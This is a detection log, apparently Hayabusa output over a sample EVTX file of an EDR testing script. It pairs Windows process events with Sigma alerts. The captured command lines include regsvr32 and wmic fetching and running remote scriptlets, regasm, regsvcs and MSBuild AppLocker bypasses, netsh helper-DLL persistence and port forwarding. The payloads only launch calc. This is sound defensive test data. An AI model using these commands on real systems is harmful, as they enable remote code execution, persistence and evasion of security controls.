Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6552 | PGUID: 747F3D96-6628-5D3F-0000-0010349B8800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:30.074 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: 
""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4564 | PGUID: 747F3D96-6629-5D3F-0000-0010C0BE8800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6020 | PGUID: 747F3D96-662E-5D3F-0000-001011038900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1976 | PGUID: 747F3D96-662E-5D3F-0000-0010C2048900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.483 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | 
Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2604 | PGUID: 747F3D96-662E-5D3F-0000-001054068900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4092 | PGUID: 747F3D96-6633-5D3F-0000-001051608900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5056 | PGUID: 747F3D96-6633-5D3F-0000-001092628900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 
+2019-07-30 06:33:39.372 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5256 | PGUID: 747F3D96-6633-5D3F-0000-0010F0638900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll | LID: 0x413182 | PID: 3512 | PGUID: 747F3D96-6633-5D3F-0000-0010D9778900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.268 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1652 | PGUID: 747F3D96-6638-5D3F-0000-00103DA88900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.287 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: 
C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4632 | PGUID: 747F3D96-6638-5D3F-0000-001022AA8900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | LID: 0x413182 | PID: 4288 | PGUID: 747F3D96-6638-5D3F-0000-001067BA8900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:45.581 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | LID: 0x413182 | PID: 208 | PGUID: 
747F3D96-6639-5D3F-0000-001074F48900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:46.095 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49829 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 4288 | PGUID: 747F3D96-6638-5D3F-0000-001067BA8900,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:46.095 +09:00,MSEDGEWIN10,3,high,Exec | Evas,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:49.340 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\xxxFile.csproj | Process: C:\Windows\System32\cmd.exe | PID: 1208 | PGUID: 747F3D96-6609-5D3F-0000-00109FBF8500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3240 | PGUID: 747F3D96-663D-5D3F-0000-00106F608A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker 
Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:49.889 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4184 | PGUID: 747F3D96-663D-5D3F-0000-001074658A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj | LID: 0x413182 | PID: 5340 | PGUID: 747F3D96-663D-5D3F-0000-001062708A00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:53.776 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4260 | PGUID: 
747F3D96-6641-5D3F-0000-0010A38C8A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:53.843 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1516 | PGUID: 747F3D96-6641-5D3F-0000-001066918A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | LID: 0x413182 | PID: 4896 | PGUID: 747F3D96-6642-5D3F-0000-0010F69D8A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,Evas | Exec,SquiblyTwo,,rules/sigma/process_creation/proc_creation_win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,Exec,Suspicious WMI Reconnaissance,,rules/sigma/process_creation/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,Evas,XSL Script 
Processing,,rules/sigma/process_creation/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.630 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Microsoft\Windows\INetCache\IE\LQ86GWLO\Wmic_calc[1].xsl | Process: C:\Windows\System32\Wbem\WMIC.exe | PID: 4896 | PGUID: 747F3D96-6642-5D3F-0000-0010F69D8A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.630 +09:00,MSEDGEWIN10,11,high,,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.718 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | LID: 0x413182 | PID: 5728 | PGUID: 747F3D96-6642-5D3F-0000-0010D6C98A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:56.665 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49830 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\wbem\WMIC.exe | PID: 4896 | PGUID: 747F3D96-6642-5D3F-0000-0010F69D8A00,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh trace 
start capture=yes filemode=append persistent=yes tracefile=trace.etl | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5084 | PGUID: 747F3D96-6646-5D3F-0000-0010E32E8B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,medium,Disc | CredAccess,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/proc_creation_win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.286 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh trace show status | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4148 | PGUID: 747F3D96-6646-5D3F-0000-0010A7318B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.485 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh.exe add helper AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3824 | PGUID: 747F3D96-6646-5D3F-0000-001051388B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.543 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | 
Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6760 | PGUID: 747F3D96-6646-5D3F-0000-001029398B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.598 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3868 | PGUID: 747F3D96-6646-5D3F-0000-0010A7398B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.683 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh trace stop | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6232 | PGUID: 747F3D96-6646-5D3F-0000-0010913A8B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.330 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh trace show status | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh trace show status | LID: 0x413182 | PID: 5760 | PGUID: 747F3D96-6647-5D3F-0000-0010F4648B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | 
Parent Cmd: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | LID: 0x413182 | PID: 5056 | PGUID: 747F3D96-6647-5D3F-0000-0010AE6E8B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,medium,Disc | CredAccess,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/proc_creation_win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.434 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh trace stop | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh trace stop | LID: 0x413182 | PID: 4568 | PGUID: 747F3D96-6647-5D3F-0000-001005738B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 | LID: 0x413182 | PID: 5048 | PGUID: 747F3D96-6647-5D3F-0000-001065758B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,medium,LatMov | Evas | C2,Netsh Port Forwarding,,rules/sigma/process_creation/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh interface portproxy add v4tov4 listenport=8080 
listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 | LID: 0x413182 | PID: 4028 | PGUID: 747F3D96-6647-5D3F-0000-001057768B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,medium,LatMov | Evas | C2,Netsh Port Forwarding,,rules/sigma/process_creation/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh.exe add helper AllTheThings.dll | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh.exe add helper AllTheThings.dll | LID: 0x413182 | PID: 5236 | PGUID: 747F3D96-6647-5D3F-0000-0010927C8B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,high,PrivEsc,Suspicious Netsh DLL Persistence,,rules/sigma/process_creation/proc_creation_win_susp_netsh_dll_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.731 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 5376 | PGUID: 747F3D96-6647-5D3F-0000-001052998B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 
